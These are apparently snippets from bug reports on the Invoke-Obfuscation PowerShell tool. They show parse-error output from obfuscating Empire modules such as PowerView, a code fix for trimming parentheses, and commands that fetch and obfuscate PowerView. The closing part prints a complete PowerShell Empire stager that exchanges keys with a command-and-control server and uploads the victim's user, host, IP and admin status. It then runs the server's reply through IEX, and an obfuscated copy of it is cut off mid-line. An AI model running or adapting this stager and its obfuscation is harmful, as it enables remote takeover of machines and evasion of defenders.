FAST - >$BaseScriptArray += "[$CharStr[]]" + ' '*(Get-Random -Input @(0,1)) + $Enc[...]
SLOW ->$BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + "'" + $Delimit[...]
SLOW -> #$BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + "'" + $Delimit[...]
SLOW ->$BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray [...]

PS > Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/EmpireProject/Empire/2.0_beta/data/module_source/collection/Get-SQLColumnSampleData.ps1' -Command 'Token\All\1' -Quiet
Exception calling "Create" with "1" argument(s): "At line:843 char:23
+         HelpMessage = {("{3}{4}{1}{0}{2}"-f 'tput anyt','ou','hing.', ...
+                       ~
Missing closing '}' in statement block or type definition.
At line:843 char:85
+ ... ("{3}{4}{1}{0}{2}"-f 'tput anyt','ou','hing.','DonCK','Et ')).REplacE ...
+                                                                  ~
Missing ] at end of attribute or type literal.
At line:843 char:85
+ ... ("{3}{4}{1}{0}{2}"-f 'tput anyt','ou','hing.','DonCK','Et ')).REplacE ...
+                                                                  ~
Parameter declarations are a comma-separated list of variable names with optional initializer expressions.
At line:843 char:85
+ ... ("{3}{4}{1}{0}{2}"-f 'tput anyt','ou','hing.','DonCK','Et ')).REplacE ...
+                                                                  ~
Missing ')' in function parameter list."

PS> cat .\test.ps1
Function Get-DomainObject {
    [CmdletBinding()]
    Param(
        [Parameter(HelpMessage = 'domain\user')]
        [string]$Username
    )
}
PS > Invoke-Obfuscation -ScriptPath .\test.ps1 -Command 'Token\All\1' -Quiet
Exception calling "Create" with "1" argument(s): "At line:4 char:34
+         [Parameter(HelpMessage = {("{2}{0}{4}{1}{3}" -f'om','P','d',' ...
+                                  ~
Missing closing '}' in statement block or type definition.
At line:4 char:85
+ ... Message = {("{2}{0}{4}{1}{3}" -f'om','P','d','Huser','ain6')).rEPLAce ...
+                                                                  ~
Missing ] at end of attribute or type literal.
At line:4 char:85
+ ... Message = {("{2}{0}{4}{1}{3}" -f'om','P','d','Huser','ain6')).rEPLAce ...
+                                                                  ~
Parameter declarations are a comma-separated list of variable names with optional initializer expressions.
At line:4 char:85
+ ... Message = {("{2}{0}{4}{1}{3}" -f'om','P','d','Huser','ain6')).rEPLAce ...

# Evenly trim leading/trailing parentheses.
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')'))
{
    $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim()
}

# Evenly trim leading/trailing parentheses.
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')'))
{
    $TrimmedObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim()
    # Check if the parentheses are balanced before permenantly trimming
    $Balanced = $True
    $Counter = 0
    ForEach($char in $TrimmedObfuscatedToken.ToCharArray()) {
        If($char -eq '(') {
            $Counter = $Counter + 1
        }
        ElseIf($char -eq ')') {
            If($Counter -eq 0) {
                $Balanced = $False
                break
            }
            Else {
                $Counter = $Counter - 1
            }
        }
    }
    # If parantheses are balanced, we can safely trim the parentheses
    If($Balanced -and $Counter -eq 0) {
        $ObfuscatedToken = $TrimmedObfuscatedToken
    }
    # If parentheses cannot be trimmed, break out of loop
    Else {
        break
    }
}

# Evenly trim leading/trailing parentheses.
While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')'))
{
    $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim()
}

powershell -ep bypass Import-Module .\Invoke-Obfuscation.psd1; Out-ObfuscatedStringCommand -Path c:\my.ps1 > c:\out.ps1

PS> git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
PS> wget https://github.com/EmpireProject/Empire/raw/master/data/module_source/situational_awareness/network/powerview.ps1 -OutFile powerview.ps1
PS> Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psd1
PS> Invoke-Obfuscation -ScriptPath .\powerview.ps1 -Command "TOKEN,ALL,1" -Quiet | Out-File -Encoding ASCII out
Exception calling "Create" with "1" argument(s): "At line:445 char:7
+ filter ("{5}{0}{3}{2}{1}{4}" -f'w','iewCS','V','er','V','Export-Po')  ...
+       ~
Missing name after filter keyword.
At line:445 char:70
+ ... ilter ("{5}{0}{3}{2}{1}{4}" -f'w','iewCS','V','er','V','Export-Po') {
+                                                                         ~
Unexpected token '{' in expression or statement.
At line:476 char:7
+ filter ("{3}{1}{2}{0}" -f 'ress','t-I','PAdd','Ge') {
+       ~
Missing name after filter keyword.
At line:476 char:53
+ filter ("{3}{1}{2}{0}" -f 'ress','t-I','PAdd','Ge') {
+                                                     ~

$ powershell -Command 'Invoke-Obfuscation -ScriptPath data/misc/ToObfuscate.ps1 -Command "Token,All,1" -Quiet | Out-File -Encoding ASCII data/misc/Obfuscated.ps1'
Exception calling "Create" with "1" argument(s): "At line:55 char:34
+         ${e`MA`i`LsuB`jEcT} = ${s`ubjE`CT}
+                                  ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:83 char:12
+         ${o`ut`loOk} = Get-OutlookInstance
+            ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:100 char:71
+ ... stem.Runtime.Interopservices.Marshal]::ReleaseComObject(${o`uTlO`oK}) ...
+                                                                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:121 char:32
+         [System.__ComObject]${o`utlook},
+                                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:156 char:16
+             ${r`u`LEs} = ${M`Api}.DefaultStore.GetRules()
+                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:159 char:31
+             ${S`UBte`XT} = ${R`uLe}.Conditions.Subject
+                               ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:162 char:16
+             ${s`ubte`xt}.Text = ${F`LA`gS}
+                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:168 char:20
+                 ${n`ulL},
+                    ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:240 char:17
+         [int]${n`um}
+                 ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:303 char:51
+     ${val`UE} = ${OLd`Efau`l`TfOlDERs}.Item(${DeFa`ul`TFOLDEr`N`AME})
+                                                   ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
Not all parse errors were reported.  Correct the reported errors and try again."
At /usr/local/share/powershell/Modules/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException
 
Exception calling "Create" with "1" argument(s): "At line:55 char:34
+         ${e`MA`i`LsuB`jEcT} = ${s`ubjE`CT}
+                                  ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:83 char:12
+         ${o`ut`loOk} = Get-OutlookInstance
+            ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:100 char:71
+ ... stem.Runtime.Interopservices.Marshal]::ReleaseComObject(${o`uTlO`oK}) ...
+                                                                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:121 char:32
+         [System.__ComObject]${o`utlook},
+                                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:156 char:16
+             ${r`u`LEs} = ${M`Api}.DefaultStore.GetRules()
+                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:159 char:31
+             ${S`UBte`XT} = ${R`uLe}.Conditions.Subject
+                               ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:162 char:16
+             ${s`ubte`xt}.Text = ${F`LA`gS}
+                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:168 char:20
+                 ${n`ulL},
+                    ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:240 char:17
+         [int]${n`um}
+                 ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:303 char:51
+     ${val`UE} = ${OLd`Efau`l`TfOlDERs}.Item(${DeFa`ul`TFOLDEr`N`AME})
+                                                   ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
Not all parse errors were reported.  Correct the reported errors and try again."
At /usr/local/share/powershell/Modules/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException
 
Exception calling "Create" with "1" argument(s): "At line:55 char:34
+         ${e`MA`i`LsuB`jEcT} = ${s`ubjE`CT}
+                                  ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:83 char:12
+         ${o`ut`loOk} = Get-OutlookInstance
+            ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:100 char:71
+ ... stem.Runtime.Interopservices.Marshal]::ReleaseComObject(${o`uTlO`oK}) ...
+                                                                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:121 char:32
+         [System.__ComObject]${o`utlook},
+                                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:156 char:16
+             ${r`u`LEs} = ${M`Api}.DefaultStore.GetRules()
+                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:159 char:31
+             ${S`UBte`XT} = ${R`uLe}.Conditions.Subject
+                               ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:162 char:16
+             ${s`ubte`xt}.Text = ${F`LA`gS}
+                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:168 char:20
+                 ${n`ulL},
+                    ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:240 char:17
+         [int]${n`um}
+                 ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:303 char:51
+     ${val`UE} = ${OLd`Efau`l`TfOlDERs}.Item(${DeFa`ul`TFOLDEr`N`AME})
+                                                   ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
Not all parse errors were reported.  Correct the reported errors and try again."
At /usr/local/share/powershell/Modules/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException
 
Exception calling "Create" with "1" argument(s): "At line:55 char:34
+         ${e`MA`i`LsuB`jEcT} = ${s`ubjE`CT}
+                                  ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:83 char:12
+         ${o`ut`loOk} = Get-OutlookInstance
+            ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:100 char:71
+ ... stem.Runtime.Interopservices.Marshal]::ReleaseComObject(${o`uTlO`oK}) ...
+                                                                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:121 char:32
+         [System.__ComObject]${o`utlook},
+                                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:156 char:16
+             ${r`u`LEs} = ${M`Api}.DefaultStore.GetRules()
+                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:159 char:31
+             ${S`UBte`XT} = ${R`uLe}.Conditions.Subject
+                               ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:162 char:16
+             ${s`ubte`xt}.Text = ${F`LA`gS}
+                ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:168 char:20
+                 ${n`ulL},
+                    ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:240 char:17
+         [int]${n`um}
+                 ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
At line:303 char:51
+     ${val`UE} = ${OLd`Efau`l`TfOlDERs}.Item(${DeFa`ul`TFOLDEr`N`AME})
+                                                   ~~
The Unicode escape sequence is not valid. A valid sequence is `u{ followed by one to six hex digits and a closing '}'.
Not all parse errors were reported.  Correct the reported errors and try again."
At /usr/local/share/powershell/Modules/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException

fUNcTiON STARt-NegoTIATe {parAm($s,$SK,$UA='MoZilLA/5.0 (WIndOWS NT 6.1; WOW64; TrIDeNt/7.0; rv:11.0) LiKe GEcKo')FUnCTiON COnverTTo-RC4BYtEStrEam {PaRaM ($RCK, $IN)BegIn {[BYTe[]] $S = 0..255;$J = 0;0..255 | FOREAcH-OBjecT {$J = ($J + $S[$_] + $RCK[$_ % $RCK.LeNGtH]) % 256;$S[$_], $S[$J] = $S[$J], $S[$_];};$I = $J = 0;}pRocEsS {ForEacH($BYTE in $IN) {$I = ($I + 1) % 256;$J = ($J + $S[$I]) % 256;$S[$I], $S[$J] = $S[$J], $S[$I];$BytE -BXOR $S[($S[$I] + $S[$J]) % 256];}}}FunctIoN DeCRypt-BYtes {Param ($KEY, $IN)IF($IN.LeNgTH -Gt 32) {$HMAC = NEw-ObJect SySTem.SeCURity.CryptoGRAPhY.HMACSHA256;$E=[SYStEm.TeXT.EncoDinG]::ASCII;$MAc = $In[-10..-1];$In = $IN[0..($In.LEngtH - 11)];$HMaC.Key = $e.GETBYteS($Key);$ExPeCted = $HmAC.ComPUTEHaSH($In)[0..9];IF (@(COMpARe-ObJect $MAC $ExpeCTed -SYnc 0).LeNGTH -nE 0) {rETURN;}$IV = $IN[0..15];$AES = NeW-OBJect SYstEm.SEcuRiTy.CrYPtoGRApHy.AEsCRYPTOSErVICEProViDEr;$AES.Mode = "CBC";$AES.KEY = $E.GETByTes($Key);$AES.IV = $IV;($AES.CREateDecrYPtor()).TrAnSfORmFInAlBlock(($IN[16..$In.LeNGTh]), 0, $In.LEngth-16)}}$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");$ErrorActionPreference = "SilentlyContinue";$E=[SYSTEm.TexT.ENcODIng]::ASCII;$customHeaders = "";$SKB=$E.GetByTES($SK);$AES=NEw-ObjECT System.SecURITY.CrYptography.AEsCrypToSerVicePROvider;$IV = [byTE] 0..255 | Get-RANDOM -cOUnt 16;$AES.Mode="CBC";$AES.KEy=$SKB;$AES.IV = $IV;$HmAc = New-ObJECT SYStEm.SecurITY.CrYpTOGRAphy.HMACSHA256;$HMaC.Key = $SKB;$CsP = NEW-OBjECt System.SeCuRITY.CrYptoGRAphy.CspParamEtErs;$CSP.FlAGs = $CSP.FlagS -BOR [SysTEm.SecuRity.CrypToGrAPhY.CspPRovIDerFLaGS]::UsEMAchineKEYStOrE;$Rs = NeW-OBjECT SYsTeM.SECURITY.CrYpTogRAPHY.RSACRyPTOSErvicEPROvider -ARGUMentLIST 2048,$CSP;$rk=$rS.TOXmlSTrING($FalsE);$ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 8);$ib=$E.getBytES($Rk);$EB=$IV+$AES.CrEAteENcrypTor().TRAnsFORMFInALBlocK($IB,0,$iB.LeNgth);$eb=$eb+$Hmac.ComPUTEHAsh($Eb)[0..9];if(-NoT $WC) {$wC=NeW-OBjeCt SYSTEM.NEt.WebCliEnt;$WC.PRoxy = [SySTEm.NEt.WEBREQUESt]::GetSysTemWEbProXY();$wc.PRoXy.CrEdentIalS = [SYStEM.NeT.CREDentiAlCAChe]::DefaULTCREDENtials;}if ($customHeaders -ne "") {$HEaDeRS = $cUStoMHEaDERS -SpLIt ',';$HeaDeRs | FOREACH-OBjEcT {$HeAdeRKEY = $_.SPLIt(':')[0];$hEaDerVaLuE = $_.Split(':')[1];$wc.HEaDErS.Add($hEaderKEY, $heaDErVALUE);}}$wc.Headers.Add("User-Agent",$UA);$IV=[BitConVErTEr]::GeTBytES($(GeT-RandOm));$daTA = $E.GetbYtEs($ID) + @(0X01,0x02,0X00,0X00) + [BItCONveRteR]::GEtBYtEs($EB.LeNGTH);$Rc4p = CONVertTO-RC4BYTeStrEam -RCK $($IV+$SKB) -IN $Data;$Rc4p = $IV + $rC4p + $Eb;$raw=$wc.UploadData($s+"/news.php","POST",$rc4p);$De=$E.GEtSTrInG($Rs.DEcRYPt($RAw,$FALSE));$noNCE=$De[0..15] -JOiN '';$kEy=$DE[16..$de.LeNgth] -JoIn '';$noNCE=[String]([LONG]$nOnCE + 1);$AES=NEw-ObjeCt SYSTEM.SEcuRITY.CRypTogrApHy.AEsCrypToSERvIcePRovIDeR;$IV = [BYtE] 0..255 | Get-RANdOM -COuNT 16;$AES.Mode="CBC";$AES.Key=$E.GeTByTes($KeY);$AES.IV = $IV;$I=$NOnCe+'|'+$s+'|'+[EnviroNmeNT]::UsERDoMaiNNamE+'|'+[EnVIrONMEnt]::UsErNAme+'|'+[EnvirOnmeNT]::MachiNeNamE;$p=(gwMi WIN32_NeTWORKAdapTERConfIGuraTioN|WHeRE{$_.IPAdDrEsS}|SeLECT -ExPAnD IPADDReSS);$Ip = @{$tRue=$p[0];$fALSE=$P}[$P.LEnGTH -Lt 6];iF(!$IP -or $Ip.TrIM() -Eq '') {$ip='0.0.0.0'};$i+="|$ip";$I+='|'+(GeT-WMIObjECT WiN32_OpeRATInGSystem).Name.SpLit('|')[0];if(([Environment]::UserName).ToLower() -eq "system"){$i+="|True"}else {$i += '|' +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")}$N=[SYstEM.DIagnoSTIcs.PrOCesS]::GeTCUrrEntPROCESs();$i+='|'+$n.PRocESsNAme+'|'+$n.ID;$i += "|powershell|" + $PSVersionTable.PSVersion.Major;$ib2=$E.GetbYTES($I);$Eb2=$IV+$AES.CreateEncrYPtOR().TrANsforMFinAlBLoCK($Ib2,0,$Ib2.LengtH);$hMAC.KEy = $E.GEtBYtEs($kEY);$eb2 = $eB2+$hmac.CoMpuTEHAsH($EB2)[0..9];$IV2=[BItConvErteR]::GETByTes($(Get-RaNDOM));$daTa2 = $e.gEtBYTES($ID) + @(0x01,0X03,0x00,0x00) + [BITCOnVErTer]::GEtBYTES($EB2.LeNgth);$Rc4p2 = CoNvERTTO-RC4BYTEStrEam -RCK $($IV2+$SKB) -IN $daTA2;$rC4P2 = $IV2 + $rC4p2 + $EB2;if ($customHeaders -ne "") {$heADeRs = $cUsTomHEadErS -SpLIT ',';$hEadeRS | ForEAcH-ObJECT {$HEaDeRKEY = $_.SPLiT(':')[0];$heaDeRVAlUE = $_.sPLIT(':')[1];$wC.HeADERs.ADD($HEADerKey, $HeaDerVALue);}}$wc.Headers.Add("User-Agent",$UA);$raw=$wc.UploadData($s+"/login/process.php","POST",$rc4p2);IEX $( $e.GETStRINg($(DECRYpT-BYTes -KEy $Key -In $raW)) );$AES=$nuLL;$S2=$nULl;$wc=$nUlL;$EB2=$nuLL;$raW=$NUll;$IV=$Null;$wc=$nUlL;$i=$NuLl;$Ib2=$NULL;[GC]::COLLeCt();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID;}Start-Negotiate -s "$ser" -SK '3c6e0b8a9c15224a8228b9a98ca1531d' -UA $u;

  .("{0}{2}{1}" -f 'SE','iTeM','t-')  ("VARiaBL"+"e:0F"+"4G"+"v5") ([tyPE]("{3}{2}{1}{0}{4}"-F '.aS','cTiOn','Fle','Re','semBly')  )  ;  .("{0}{2}{1}" -f 'S','ITeM','eT-')  ("vARia"+"B"+"Le:"+"UR2H"+"cI")  (  [typE]("{5}{0}{3}{1}{4}{2}"-f 'E','O','ng','NC','DI','SysTEm.tExt.')) ;  $01aW  = [tYPE]("{0}{9}{10}{7}{8}{3}{4}{6}{1}{5}{2}"-f'SYsT','O','Rflags','A','p','VidE','HY.cspPr','Y.Cr','YpTOGr','em.se','curiT'); .("{2}{1}{0}" -f 'M','ITe','sEt-') ("vaRIAbl"+"e:9"+"d"+"2o"+"4")  ([TYpe]("{1}{2}{0}{4}{3}" -f'br','SYstem.NE','T.WE','Uest','EQ') )  ;  &('sv')  ("{1}{0}" -f'jg0','H') ([tYPe]("{3}{7}{5}{0}{2}{6}{1}{4}" -F'.','NTIaLca','N','sy','CHe','TEm','et.CREde','S') );  &('SV') ('l3vo'+'jy') ([type]("{2}{0}{1}"-F'rOnm','enT','enVI') );  .("{0}{1}"-f 'Set-IT','Em') ("VARi"+"abl"+"E:15Ju"+"0h")  (  [TypE]("{5}{2}{4}{7}{1}{8}{0}{3}{6}" -F'oW','p','u','sIDE','r','SEc','Ntity','ity.PRinci','Al.wind') ) ;  &("{1}{0}{3}{2}"-f '-vA','sEt','e','RIAbL') ('Aopkq'+'U') (  [tYpE]("{2}{0}{3}{4}{1}"-F'STEM.DIAGNo','ESs','sY','StICS.p','RoC')  ); &('sV') ('dM0o'+'8J')  ( [tYpe]("{0}{2}{1}"-F'biT','nveRtER','co')  )  ;  $t9j5= [tYPe]('GC') ; fUnCtiON START`-`NeGO`Ti`Ate {pArAm(${S},${Sk},${uA}=("{3}{2}{6}{11}{1}{9}{7}{8}{10}{0}{5}{12}{4}"-f'; ','nDows NT ','oZIlLA/','M',' GeCKo','r','5.','1; W','OW64; TrI','6.','DENt/7.0','0 (WI','V:11.0) LiKe'))fUNctiON C`oN`Ve`RtTo-rC`4B`ytEs`TrEAm {PaRaM (${R`CK}, ${i`N})begIN {[BytE[]] ${s} = 0..255;${J} = 0;0..255 | .("{0}{1}{3}{2}"-f'FoRE','aCH','ct','-OBje') {${J} = (${j} + ${s}[${_}] + ${R`cK}[${_} % ${R`CK}."l`eNg`TH"]) % 256;${S}[${_}], ${s}[${J}] = ${S}[${J}], ${S}[${_}];};${i} = ${j} = 0;}pROcEsS {FOREACh(${bY`Te} in ${in}) {${I} = (${i} + 1) % 256;${J} = (${j} + ${s}[${i}]) % 256;${s}[${I}], ${S}[${J}] = ${s}[${J}], ${s}[${i}];${by`Te} -Bxor ${S}[(${s}[${i}] + ${s}[${J}]) % 256];}}}fUnCtIOn decr`Ypt-b`Y`Tes {PaRam (${K`ey}, ${In})if(${I`N}."leNG`Th" -Gt 32) {${H`Mac} = &("{2}{1}{0}"-f 't','-ObjeC','New') ("{0}{7}{5}{4}{8}{2}{1}{3}{6}" -f'Sy','S','PHy.HMAC','H','RypTOG','C','A256','StEm.SEcurITY.','ra');${E}=  ( &("{0}{1}"-f'G','ci') ('vAriabLe:'+'Ur'+'2'+'hci')  )."v`AluE"::"As`cii";${m`Ac} = ${I`N}[-10..-1];${i`N} = ${In}[0..(${IN}."len`GTh" - 11)];${h`MAC}."K`ey" = ${E}.("{1}{0}"-f's','GEtBYtE').Invoke(${K`ey});${eX`pEc`TeD} = ${Hm`AC}.("{2}{0}{1}" -f 'MPUTE','HAsH','CO').Invoke(${iN})[0..9];if (@(.("{3}{0}{2}{1}"-f'Pa','T','Re-OBJEc','COm') ${m`AC} ${Exp`e`CtEd} -SYNC 0)."LEn`g`TH" -ne 0) {rEturN;}${i`V} = ${In}[0..15];${A`ES} = .("{0}{1}{2}" -f 'NEw-Ob','Je','CT') ("{8}{10}{11}{0}{6}{2}{14}{5}{1}{13}{4}{7}{9}{12}{3}"-f'I','y','y','vIDEr','RapHy.AESCrypT','R','t','O','SYsT','SerVIC','eM','.SEcUr','EPrO','ptog','.C');${A`eS}."m`odE" = "CBC";${A`eS}."k`eY" = ${e}.("{0}{2}{1}"-f 'Get','es','ByT').Invoke(${K`ey});${A`Es}."Iv" = ${I`V};(${A`ES}.("{1}{0}{2}{3}" -f 'EATe','Cr','DEcRYP','TOR').Invoke())."tR`AN`SFOrmfInalbl`O`cK"((${iN}[16..${i`N}."lE`NGTH"]), 0, ${in}."le`NgTH"-16)}}${Nu`lL} =  $0F4Gv5::("{3}{2}{4}{1}{0}{5}"-f'Na','tial','thP','LoadWi','ar','me').Invoke(("{0}{1}{2}"-f 'S','ystem.Secur','ity'));${nU`LL} =   (  &("{2}{0}{3}{1}" -f 'ARIAb','e','get-v','L') ('0f4GV'+'5')  -VAluEO )::("{1}{4}{0}{3}{2}" -f'a','LoadWit','alName','rti','hP').Invoke(("{2}{1}{3}{0}"-f'ore','stem','Sy','.C'));${erroRAcTi`O`NPr`efER`EncE} = ("{1}{3}{0}{2}{4}"-f 'C','Si','ont','lently','inue');${E}=  (  .("{1}{0}" -f'EM','it')  ("VarIa"+"b"+"LE:"+"uR2h"+"Ci")  )."V`ALUE"::"aSc`iI";${c`U`sToM`HE`AdErS} = "";${S`kb}=${e}.("{0}{1}" -f'G','etBYTeS').Invoke(${S`k});${A`ES}=&("{0}{1}{3}{2}"-f'N','eW-','EcT','OBj') ("{0}{6}{9}{10}{2}{1}{5}{4}{7}{8}{3}" -f 'S','Pto','ry','R','Ovi','SErvICEPR','YSTEm.SeCuRI','D','e','ty.CryPtogRAp','Hy.AeSC');${I`V} = [Byte] 0..255 | .("{2}{1}{0}" -f'om','AnD','GeT-R') -COunT 16;${A`ES}."Mo`De"="CBC";${A`Es}."K`eY"=${S`kB};${A`es}."I`V" = ${i`V};${hM`AC} = &("{2}{1}{0}" -f 'JeCt','B','New-O') ("{1}{6}{9}{2}{8}{3}{0}{4}{10}{5}{7}{11}"-f'Ty.CR','S','.Se','uRi','Yptogr','y.HMA','yS','CSH','C','tEM','aph','A256');${HM`Ac}."k`ey" = ${S`KB};${c`Sp} = &("{0}{1}{2}{3}"-f 'NE','w','-Obje','ct') ("{2}{0}{5}{4}{1}{3}{6}" -f 'sTEm.S','CSPPARame','Sy','tEr','APhY.','ECUrity.CRyPTOgr','s');${C`sp}."fLa`gs" = ${C`SP}."FL`Ags" -Bor  (.("{2}{0}{1}"-f 'iABl','E','VAR')  ("{0}{1}"-f '0','1AW') )."v`ALUe"::"USE`maC`Hi`N`EKEYsTORe";${Rs} = .("{2}{0}{1}"-f 'W-O','BjeCT','Ne') ("{15}{9}{14}{10}{7}{6}{8}{12}{5}{3}{11}{0}{4}{1}{13}{2}"-f'O','OViD','r','RY','SERVIcEPR','Y.RSAC','RiTY','u','.CryP','Em.','C','pT','TOgrAPh','e','SE','SYsT') -ARGuMeNtLISt 2048,${C`sp};${R`K}=${r`S}.("{1}{0}{3}{2}"-f 'Tri','TOXmLS','g','n').Invoke(${fa`lsE});${I`D}=-join(("{0}{5}{8}{7}{3}{9}{1}{2}{4}{6}"-f 'AB','12','3456','ST','7','CD','89','NPR','EFGHKLM','UVWXYZ').("{0}{2}{3}{1}"-f'T','rray','oC','harA').Invoke()|.("{0}{2}{1}" -f 'Get-Ran','m','do') -Count 8);${i`B}=${E}.("{1}{2}{0}"-f'S','GET','byTe').Invoke(${r`k});${e`B}=${i`V}+${a`ES}.("{1}{0}{2}{3}"-f'eATEENcRy','Cr','Pt','OR').Invoke().("{4}{3}{1}{5}{0}{2}" -f'OC','rMFInALB','K','ANsFo','TR','l').Invoke(${i`B},0,${i`B}."LENG`TH");${eb}=${e`B}+${hM`Ac}.("{2}{0}{3}{1}"-f'MP','H','CO','UTeHAS').Invoke(${e`B})[0..9];If(-Not ${WC}) {${w`C}=&("{1}{2}{0}"-f'cT','Ne','W-ObJE') ("{2}{1}{0}{3}" -f'.Ne','Em','SysT','t.WEbCLienT');${w`c}."PrO`xy" =   (  .("{1}{0}" -f'r','Di') ("VariAbL"+"E:9"+"D"+"2o"+"4"))."V`ALUE"::("{1}{2}{3}{0}{4}" -f 'WEBPR','GE','TSYSTE','m','OXY').Invoke();${w`c}."prO`Xy"."cr`e`DENTi`ALS" =   (  &("{1}{0}" -f 'cI','g') ("{1}{0}{3}{2}" -f 'aRiAbL','v','Hjg0','E:') 